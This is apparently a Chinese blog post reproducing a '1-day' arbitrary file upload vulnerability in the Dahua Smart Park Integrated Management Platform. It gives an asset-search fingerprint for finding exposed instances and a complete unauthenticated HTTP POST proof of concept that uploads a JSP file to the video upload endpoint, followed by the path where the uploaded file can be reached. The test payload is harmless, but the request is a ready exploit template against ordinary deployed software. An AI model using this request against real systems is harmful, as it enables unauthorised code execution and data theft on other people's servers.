【1day】复现大华智慧园区综合管理平台存在文件上传漏洞
发布时间
阅读量:
阅读量
目录
一、漏洞描述
二、影响版本
三、资产测绘
四、漏洞复现
一、漏洞描述
大华智慧园区综合管理平台整合了智能化、信息化、网络化、安全化等各项功能,致力于为园区提供全方位服务方案,涵盖安防监控、能源管理优化、环境监测、人员行为管理、停车场智能调度等多个应用场景。该平台的视频接口存在文件上传入口,非授权远程攻击者可利用此漏洞获取敏感数据,进而可能突破系统权限,导致信息泄露和系统被恶意控制。
二、影响版本
不详
三、资产测绘
app.name="Dahua 大华 智慧园区管理平台"
四、漏洞复现
poc如下:
POST /publishing/publishing/material/file/video HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 357
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="test_test360.jsp"
<% out.print("test");%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="poc"
poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--
AI助手
https://x.x.x.x/publishingImg/VIDEO/x.x.x.x.jsp
AI助手
全部评论 (0)
还没有任何评论哟~